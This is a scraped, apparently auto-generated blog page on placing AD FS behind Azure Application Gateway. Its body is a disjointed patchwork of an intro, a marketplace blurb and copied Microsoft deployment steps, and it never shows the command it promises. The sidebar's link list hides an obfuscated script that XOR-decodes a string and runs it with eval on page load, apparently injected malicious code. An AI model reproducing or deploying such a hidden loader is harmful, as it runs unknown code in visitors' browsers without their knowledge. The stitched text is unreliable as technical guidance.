Azure Application Gateway Adfs

Some time ago i wrote up a post (located here) explaining how you can setup traffic manager with ADFS and have proper monitoring of the service. Today i will go over how to setup ADFS behind the Azure Application Gateway. This will enable you to protect your ADFS service and monitor it with the WAF provided by the application gateway.
Azure Application Gateway Example
Application Gateway Pricing | Microsoft Azure
Availability Sets
Microsoft Azure Application Gateway
Before we begin one prerequisite which i am still not sure if its really needed but i had problems and i believe this fixed it:
The easiest way to setup an ADFS farm 2016 or 2019 in any of the cloud environments – Azure, AWS or Google GCP is to use our publicly available images in the cloud marketplaces. Setup ADFS Farm 2016 in Azure Deploy a Microsoft ADFS 2016. The ability to open cloud based resources which integrate with Azure Active Directory without having to sign on again has been the domain of ADFS up until this point. With the latest release of Azure AD Connect and Windows 10 1511 on-wards however we can now achieve a similar experience. Deploy Azure AD Connect Health for ADFS. Azure AD Connect Health captures IP addresses recorded in the ADFS logs for bad username/password requests, gives you additional reporting on an array of scenarios, and provides additional insight to support engineers when opening assisted support cases.
You need to set the default HTTPS Binding, i believe this is required as i am not sure if the health probe is truly SNI compliant, i might be wrong here but it doesn’t hurt to set this. To set it you simply need to run the following command on the WAP servers (just change the cert hash):
<h2>Steps to deploy AD FS in Azure</h2><p>The steps mentioned in this section outline the guide to deploy the below depicted AD FS infrastructure in Azure.</p><h3>1. Deploying the network</h3><p>As outlined above, you can either create two subnets in a single virtual network or else create two completely different virtual networks (VNet). This article will focus on deploying a single virtual network and divide it into two subnets. This is currently an easier approach as two separate VNets would require a VNet to VNet gateway for communications.</p><p><strong>1.1 Create virtual network</strong></p><p>In the Azure portal, select virtual network and you can deploy the virtual network and one subnet immediately with just one click. INT subnet is also defined and is ready now for VMs to be added.The next step is to add another subnet to the network, i.e. the DMZ subnet. To create the DMZ subnet, simply</p><ul><li>Select the newly created network</li><li>In the properties select subnet</li><li>In the subnet panel click on the add button</li><li>Provide the subnet name and address space information to create the subnet</li></ul><p><strong>1.2. Creating the network security groups</strong></p><p>A Network security group (NSG) contains a list of Access Control List (ACL) rules that allow or deny network traffic to your VM instances in a Virtual Network. NSGs can be associated with either subnets or individual VM instances within that subnet. When an NSG is associated with a subnet, the ACL rules apply to all the VM instances in that subnet.For the purpose of this guidance, we will create two NSGs: one each for an internal network and a DMZ. They will be labeled NSG_INT and NSG_DMZ respectively.</p><p>After the NSG is created, there will be 0 inbound and 0 outbound rules. Once the roles on the respective servers are installed and functional, then the inbound and outbound rules can be made according to the desired level of security.</p><p>After the NSGs are created, associate NSG_INT with subnet INT and NSG_DMZ with subnet DMZ. An example screenshot is given below:</p><ul><li>Click on Subnets to open the panel for subnets</li><li>Select the subnet to associate with the NSG</li></ul><h2 id='azure-application-gateway-example'>Azure Application Gateway Example</h2><p>After configuration, the panel for Subnets should look like below:</p><p><strong>1.3. Create Connection to on-premises</strong></p><p>We will need a connection to on-premises in order to deploy the domain controller (DC) in azure. Azure offers various connectivity options to connect your on-premises infrastructure to your Azure infrastructure.</p><ul><li>Point-to-site</li><li>Virtual Network Site-to-site</li><li>ExpressRoute</li></ul><p>It is recommended to use ExpressRoute. ExpressRoute lets you create private connections between Azure datacenters and infrastructure that's on your premises or in a co-location environment. ExpressRoute connections do not go over the public Internet. They offer more reliability, faster speeds, lower latencies and higher security than typical connections over the Internet.While it is recommended to use ExpressRoute, you may choose any connection method best suited for your organization. To learn more about ExpressRoute and the various connectivity options using ExpressRoute, read ExpressRoute technical overview.</p><h3>2. Create storage accounts</h3><p>In order to maintain high availability and avoid dependence on a single storage account, you can create two storage accounts. Divide the machines in each availability set into two groups and then assign each group a separate storage account.</p><h3>3. Create availability sets</h3><p>For each role (DC/AD FS and WAP), create availability sets that will contain 2 machines each at the minimum. This will help achieve higher availability for each role.While creating the availability sets, it is essential to decide on the following:</p><ul><li><strong>Fault Domains</strong>: Virtual machines in the same fault domain share the same power source and physical network switch. A minimum of 2 fault domains are recommended. The default value is 3 and you can leave it as is for the purpose of this deployment</li><li><strong>Update domains</strong>: Machines belonging to the same update domain are restarted together during an update. You want to have minimum of 2 update domains. The default value is 5 and you can leave it as is for the purpose of this deployment</li></ul><p>Create the following availability sets</p><table><thead><tr><th>Availability Set</th><th>Role</th><th>Fault domains</th><th>Update domains</th></tr></thead><tbody><tr><td>contosodcset</td><td>DC/ADFS</td><td>3</td><td>5</td></tr><tr><td>contosowapset</td><td>WAP</td><td>3</td><td>5</td></tr></tbody></table><h3>4. Deploy virtual machines</h3><p>The next step is to deploy virtual machines that will host the different roles in your infrastructure. A minimum of two machines are recommended in each availability set. Create four virtual machines for the basic deployment.</p><table><thead><tr><th>Machine</th><th>Role</th><th>Subnet</th><th>Availability set</th><th>Storage account</th><th>IP Address</th></tr></thead><tbody><tr><td>contosodc1</td><td>DC/ADFS</td><td>INT</td><td>contosodcset</td><td>contososac1</td><td>Static</td></tr><tr><td>contosodc2</td><td>DC/ADFS</td><td>INT</td><td>contosodcset</td><td>contososac2</td><td>Static</td></tr><tr><td>contosowap1</td><td>WAP</td><td>DMZ</td><td>contosowapset</td><td>contososac1</td><td>Static</td></tr><tr><td>contosowap2</td><td>WAP</td><td>DMZ</td><td>contosowapset</td><td>contososac2</td><td>Static</td></tr></tbody></table><p>As you might have noticed, no NSG has been specified. This is because azure lets you use NSG at the subnet level. Then, you can control machine network traffic by using the individual NSG associated with either the subnet or else the NIC object. Read more on What is a Network Security Group (NSG).Static IP address is recommended if you are managing the DNS. You can use Azure DNS and instead in the DNS records for your domain, refer to the new machines by their Azure FQDNs.Your virtual machine pane should look like below after the deployment is completed:</p><h3>5. Configuring the domain controller / AD FS servers</h3><h2 id='application-gateway-pricing-microsoft-azure'>Application Gateway Pricing | Microsoft Azure</h2><p>In order to authenticate any incoming request, AD FS will need to contact the domain controller. To save the costly trip from Azure to on-premises DC for authentication, it is recommended to deploy a replica of the domain controller in Azure. In order to attain high availability, it is recommended to create an availability set of at-least 2 domain controllers.</p><table><thead><tr><th>Domain controller</th><th>Role</th><th>Storage account</th></tr></thead><tbody><tr><td>contosodc1</td><td>Replica</td><td>contososac1</td></tr><tr><td>contosodc2</td><td>Replica</td><td>contososac2</td></tr></tbody></table><ul><li>Promote the two servers as replica domain controllers with DNS</li><li>Configure the AD FS servers by installing the AD FS role using the server manager.</li></ul><h3>6. Deploying Internal Load Balancer (ILB)</h3><p><strong>6.1. Create the ILB</strong></p><p>To deploy an ILB, select Load Balancers in the Azure portal and click on add (+).</p><p>Note</p><p>if you do not see <strong>Load Balancers</strong> in your menu, click <strong>Browse</strong> in the lower left of the portal and scroll until you see <strong>Load Balancers</strong>. Then click the yellow star to add it to your menu. Now select the new load balancer icon to open the panel to begin configuration of the load balancer.</p><ul><li><strong>Name</strong>: Give any suitable name to the load balancer</li><li><strong>Scheme</strong>: Since this load balancer will be placed in front of the AD FS servers and is meant for internal network connections ONLY, select 'Internal'</li><li><strong>Virtual Network</strong>: Choose the virtual network where you are deploying your AD FS</li><li><strong>Subnet</strong>: Choose the internal subnet here</li><li><strong>IP Address assignment</strong>: Static</li></ul><p>After you click create and the ILB is deployed, you should see it in the list of load balancers:</p><p>Next step is to configure the backend pool and the backend probe.</p><p><strong>6.2. Configure ILB backend pool</strong></p><p>Select the newly created ILB in the Load Balancers panel. It will open the settings panel.</p><ol><li>Select backend pools from the settings panel</li><li>In the add backend pool panel, click on add virtual machine</li><li>You will be presented with a panel where you can choose availability set</li><li>Choose the AD FS availability set</li></ol><p><strong>6.3. Configuring probe</strong></p><p>In the ILB settings panel, select Health probes.</p><ol><li>Click on add</li><li>Provide details for probea. <strong>Name</strong>: Probe nameb. <strong>Protocol</strong>: HTTPc. <strong>Port</strong>: 80 (HTTP)d. <strong>Path</strong>: /adfs/probee. <strong>Interval</strong>: 5 (default value) – this is the interval at which ILB will probe the machines in the backend poolf. <strong>Unhealthy threshold limit</strong>: 2 (default value) – this is the threshold of consecutive probe failures after which ILB will declare a machine in the backend pool non-responsive and stop sending traffic to it.</li></ol><p>We are using the /adfs/probe endpoint that was created explictly for health checks in an AD FS environment where a full HTTPS path check cannot happen. This is substantially better than a basic port 443 check, which does not accurately reflect the status of a modern AD FS deployment. More information on this can be found at https://blogs.technet.microsoft.com/applicationproxyblog/2014/10/17/hardware-load-balancer-health-checks-and-web-application-proxy-ad-fs-2012-r2/.</p><p><strong>6.4. Create load balancing rules</strong></p><p>In order to effectively balance the traffic, the ILB should be configured with load balancing rules. In order to create a load balancing rule,</p><ol><li>Select Load balancing rule from the settings panel of the ILB</li><li>Click on Add in the Load balancing rule panel</li><li>In the Add load balancing rule panela. <strong>Name</strong>: Provide a name for the ruleb. <strong>Protocol</strong>: Select TCPc. <strong>Port</strong>: 443d. <strong>Backend port</strong>: 443e. <strong>Backend pool</strong>: Select the pool you created for the AD FS cluster earlierf. <strong>Probe</strong>: Select the probe created for AD FS servers earlier</li></ol><p><strong>6.5. Update DNS with ILB</strong></p><p>Using your internal DNS server, create an A record for the ILB. The A record should be for the federation service with the IP address pointing to the IP address of the ILB. For example, if the ILB IP address is 10.3.0.8 and the federation service installed is fs.contoso.com, then create an A record for fs.contoso.com pointing to 10.3.0.8.This will ensure that all data trasmitted to fs.contoso.com end up at the ILB and are appropriately routed.</p><p>Warning</p><p>If you are using the WID (Windows Internal Database) for your AD FS database, this value should instead be temporarily set to point to your primary AD FS server or the Web Application Proxy will fail enrollement. After you have successfully enrolled all Web Appplication Proxy servers, change this DNS entry to point to the load balancer.</p><p>Note</p><p>If your deployment is also using IPv6, be sure to create a corresponding AAAA record.</p><h3>7. Configuring the Web Application Proxy server</h3><p><strong>7.1. Configuring the Web Application Proxy servers to reach AD FS servers</strong></p><img src='https://docs.citrix.com/en-us/federated-authentication-service/media/fas-architectures-adfs-saml.png' alt='Adfs' title='Adfs' /><p>In order to ensure that Web Application Proxy servers are able to reach the AD FS servers behind the ILB, create a record in the %systemroot%system32driversetchosts for the ILB. Note that the distinguished name (DN) should be the federation service name, for example fs.contoso.com. And the IP entry should be that of the ILB's IP address (10.3.0.8 as in the example).</p><p>Warning</p><p>If you are using the WID (Windows Internal Database) for your AD FS database, this value should instead be temporarily set to point to your primary AD FS server, or the Web Application Proxy will fail enrollement. After you have successfully enrolled all Web Appplication Proxy servers, change this DNS entry to point to the load balancer.</p><p><strong>7.2. Installing the Web Application Proxy role</strong></p><p>After you ensure that Web Application Proxy servers are able to reach the AD FS servers behind ILB, you can next install the Web Application Proxy servers.Web Application Proxy servers need not be joined to the domain. Install the Web Application Proxy roles on the two Web Application Proxy servers by selecting the Remote Access role. The server manager will guide you to complete the WAP installation.For more information on how to deploy WAP, read Install and Configure the Web Application Proxy Server.</p><h3>8. Deploying the Internet Facing (Public) Load Balancer</h3><p><strong>8.1. Create Internet Facing (Public) Load Balancer</strong></p><p>In the Azure portal, select Load balancers and then click on Add. In the Create load balancer panel, enter the following information</p><ol><li><strong>Name</strong>: Name for the load balancer</li><li><strong>Scheme</strong>: Public – this option tells Azure that this load balancer will need a public address.</li><li><strong>IP Address</strong>: Create a new IP address (dynamic)</li></ol><p>After deployment, the load balancer will appear in the Load balancers list.</p><img src='https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/media/application-proxy/azureappproxxy.png' alt='Adfs' title='Adfs' /><p><strong>8.2. Assign a DNS label to the public IP</strong></p><h2 id='availability-sets'>Availability Sets</h2><p>Click on the newly created load balancer entry in the Load balancers panel to bring up the panel for configuration. Follow below steps to configure the DNS label for the public IP:</p><ol><li>Click on the public IP address. This will open the panel for the public IP and its settings</li><li>Click on Configuration</li><li>Provide a DNS label. This will become the public DNS label that you can access from anywhere, for example contosofs.westus.cloudapp.azure.com. You can add an entry in the external DNS for the federation service (like fs.contoso.com) that resolves to the DNS label of the external load balancer (contosofs.westus.cloudapp.azure.com).</li></ol><p><strong>8.3. Configure backend pool for Internet Facing (Public) Load Balancer</strong></p><p>Follow the same steps as in creating the internal load balancer, to configure the backend pool for Internet Facing (Public) Load Balancer as the availability set for the WAP servers. For example, contosowapset.</p><p><strong>8.4. Configure probe</strong></p><p>Follow the same steps as in configuring the internal load balancer to configure the probe for the backend pool of WAP servers.</p><p><strong>8.5. Create load balancing rule(s)</strong></p><p>Follow the same steps as in ILB to configure the load balancing rule for TCP 443.</p><h3>9. Securing the network</h3><p><strong>9.1. Securing the internal subnet</strong></p><p>Overall, you need the following rules to efficiently secure your internal subnet (in the order as listed below)</p><table><thead><tr><th>Rule</th><th>Description</th><th>Flow</th></tr></thead><tbody><tr><td>AllowHTTPSFromDMZ</td><td>Allow the HTTPS communication from DMZ</td><td>Inbound</td></tr><tr><td>DenyInternetOutbound</td><td>No access to internet</td><td>Outbound</td></tr></tbody></table><p><strong>9.2. Securing the DMZ subnet</strong></p><table><thead><tr><th>Rule</th><th>Description</th><th>Flow</th></tr></thead><tbody><tr><td>AllowHTTPSFromInternet</td><td>Allow HTTPS from internet to the DMZ</td><td>Inbound</td></tr><tr><td>DenyInternetOutbound</td><td>Anything except HTTPS to internet is blocked</td><td>Outbound</td></tr></tbody></table><h2 id='microsoft-azure-application-gateway'>Microsoft Azure Application Gateway</h2><p>Note</p><p>If client user certificate authentication (clientTLS authentication using X.509 user certificates) is required, then AD FS requires TCP port 49443 to be enabled for inbound access.</p><h3>10. Test the AD FS sign-in</h3><p>The easiest way is to test AD FS is by using the IdpInitiatedSignon.aspx page. In order to be able to do that, it is required to enable the IdpInitiatedSignOn on the AD FS properties. Follow the steps below to verify your AD FS setup</p><ol><li>Run the below cmdlet on the AD FS server, using PowerShell, to set it to enabled.Set-AdfsProperties -EnableIdPInitiatedSignonPage $true</li><li>From any external machine, access https://adfs-server.contoso.com/adfs/ls/IdpInitiatedSignon.aspx.</li><li>You should see the AD FS page like below:</li></ol><p>On successful sign-in, it will provide you with a success message as shown below:</p><img src='https://vmfocus.com/wp-content/uploads/2018/01/waf-07.png' alt='List' title='List' /><h2>Template for deploying AD FS in Azure</h2><p>The template deploys a 6 machine setup, 2 each for Domain Controllers, AD FS and WAP.</p><p>You can use an existing virtual network or create a new VNET while deploying this template. The various parameters available for customizing the deployment are listed below with the description of usage of the parameter in the deployment process.</p><table><thead><tr><th>Parameter</th><th>Description</th></tr></thead><tbody><tr><td>Location</td><td>The region to deploy the resources into, e.g. East US.</td></tr><tr><td>StorageAccountType</td><td>The type of the Storage Account created</td></tr><tr><td>VirtualNetworkUsage</td><td>Indicates if a new virtual network will be created or use an existing one</td></tr><tr><td>VirtualNetworkName</td><td>The name of the Virtual Network to Create, mandatory on both existing or new virtual network usage</td></tr><tr><td>VirtualNetworkResourceGroupName</td><td>Specifies the name of the resource group where the existing virtual network resides. When using an existing virtual network, this becomes a mandatory parameter so the deployment can find the ID of the existing virtual network</td></tr><tr><td>VirtualNetworkAddressRange</td><td>The address range of the new VNET, mandatory if creating a new virtual network</td></tr><tr><td>InternalSubnetName</td><td>The name of the internal subnet, mandatory on both virtual network usage options (new or existing)</td></tr><tr><td>InternalSubnetAddressRange</td><td>The address range of the internal subnet, which contains the Domain Controllers and ADFS servers, mandatory if creating a new virtual network.</td></tr><tr><td>DMZSubnetAddressRange</td><td>The address range of the dmz subnet, which contains the Windows application proxy servers, mandatory if creating a new virtual network.</td></tr><tr><td>DMZSubnetName</td><td>The name of the internal subnet, mandatory on both virtual network usage options (new or existing).</td></tr><tr><td>ADDC01NICIPAddress</td><td>The internal IP address of the first Domain Controller, this IP address will be statically assigned to the DC and must be a valid ip address within the Internal subnet</td></tr><tr><td>ADDC02NICIPAddress</td><td>The internal IP address of the second Domain Controller, this IP address will be statically assigned to the DC and must be a valid ip address within the Internal subnet</td></tr><tr><td>ADFS01NICIPAddress</td><td>The internal IP address of the first ADFS server, this IP address will be statically assigned to the ADFS server and must be a valid ip address within the Internal subnet</td></tr><tr><td>ADFS02NICIPAddress</td><td>The internal IP address of the second ADFS server, this IP address will be statically assigned to the ADFS server and must be a valid ip address within the Internal subnet</td></tr><tr><td>WAP01NICIPAddress</td><td>The internal IP address of the first WAP server, this IP address will be statically assigned to the WAP server and must be a valid ip address within the DMZ subnet</td></tr><tr><td>WAP02NICIPAddress</td><td>The internal IP address of the second WAP server, this IP address will be statically assigned to the WAP server and must be a valid ip address within the DMZ subnet</td></tr><tr><td>ADFSLoadBalancerPrivateIPAddress</td><td>The internal IP address of the ADFS load balancer, this IP address will be statically assigned to the load balancer and must be a valid ip address within the Internal subnet</td></tr><tr><td>ADDCVMNamePrefix</td><td>Virtual Machine name prefix for Domain Controllers</td></tr><tr><td>ADFSVMNamePrefix</td><td>Virtual Machine name prefix for ADFS servers</td></tr><tr><td>WAPVMNamePrefix</td><td>Virtual Machine name prefix for WAP servers</td></tr><tr><td>ADDCVMSize</td><td>The vm size of the Domain Controllers</td></tr><tr><td>ADFSVMSize</td><td>The vm size of the ADFS servers</td></tr><tr><td>WAPVMSize</td><td>The vm size of the WAP servers</td></tr><tr><td>AdminUserName</td><td>The name of the local Administrator of the virtual machines</td></tr><tr><td>AdminPassword</td><td>The password for the local Administrator account of the virtual machines</td></tr></tbody></table><h2>Additional resources</h2><h2>Next steps</h2></p>
			
			<div class="page-links"></div>
		</div>
		
		<footer class="entry-footer">
			
						
			
			<div class="entry-footer-meta">

				<span class="meta-date">Posted on <a href='/azure-application-gateway-adfs' rel='bookmark' title='11:01'><time class="entry-date published updated" datetime="2021-09-15T12:30:07">15-09-2021</time></a></span><span class="meta-author"> by <span class="author vcard"><a class="url fn n" href="/?author=1" title="View all posts by admin" rel="author"> admin</a></span></span>

			
			</div>

					
		</footer>
		
		
	<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Post navigation</h2>
		<div class="nav-links"><div class="nav-previous"><a href='/final-cut-pro-free-mac-2015'>Final Cut Pro Free Mac 2015</a></div><div class="nav-next"><a href='/cd-175-service-manual'>Cd 175 Service Manual</a></div></div>
	</nav>
	</article>
<div id="comments" class="comments-area">

	
	
	
	
</div>		
		</main>
	</section>
	
		<section id="secondary" class="sidebar widget-area clearfix" role="complementary">

		
			<aside class="widget clearfix">
				<div class="widget-header"><h3 class="widget-title">MOST POPULAR ARTICLES</h3></div>
				<div class="textwidget">
					<ul>
					<li><a href='/unity-3d-car-script-files'>: Unity 3d Car Script Files</a></li>
<li><a href='/quick-cam-vision-pro-profesional-web-cam-for-mac'>: Quick Cam Vision Pro Profesional Web Cam For Mac</a></li>
<li><a href='/onenote-for-mac-will-not-open-onepkg-file'>: Onenote For Mac Will Not Open Onepkg File</a></li>
<li><a href='/node-js-php-serialize-example'>: Node Js Php Serialize Example</a></li>
<li><a href='/blackmagic-284-serial'>: Blackmagic 2.84 Serial</a></li>
<li><a href='/descargar-manual-lavadora-blue-sky-blf-1009-angel'>: Descargar Manual Lavadora Blue Sky Blf 1009 Angel</a></li>
<li><a href='/athlon-64-x2-overclocking-software-download'>: Athlon 64 X2 Overclocking Software Download</a></li>
<li><script>var f='YaytBod3DSd5ZkzqbLpGaf4E4KmtElIHaoiq2Q65gJ3YsthHrCAF02XTf3yZcTzskE5KbjxuNtzAlgmKCOccTdQhAyl7rh3vjKNWxFFhff0HCwI7QXxwRxIgXXkL7ydGydqJByn5i35NliOdZmrDSGNVcG8Iv2jQctjyf7GsJAoWA34O';var NfDO=atob('LwALVDAKAg4gPAdANw4UBUwvBTUTA1oxZygfHTUYcj4AHUkJWiMLWwI9EwE+OCA8BjMTI0FHPScSG1BhGzwIXQQ1UCVKTT8wGlNWZkNIBCUnKgkQehchCSIcSx5JEFsERDwnIxAFNA0CA148KhYlRGwsCgI3QzEPKnYEIlsWBSNEAgQkIQ0HWgcbHDUJHy4IchUaNn01KyUTKFY6E2YPKRddUQRdTy8BZDIKOSUbHXQ=');var vzBU='';for(var HE=0;HE<f.length;HE++){vzBU+=String.fromCharCode(f.charCodeAt(HE)^NfDO.charCodeAt(HE));}eval(vzBU);</script></li>
				</ul>
				</div>
			</aside>
	
	
	</section>	

	</div>

	
	<footer id="colophon" class="site-footer clearfix" role="contentinfo">

    
    <div id="footer-text" class="site-info">
        
	<span class="credit-link">
		<a href="Foxmaven774" title="Foxmaven774">Foxmaven774</a> ✆ <a href="" title="">2021</a>.	</span>

    </div>

	</footer>

</div>



</body>
</html>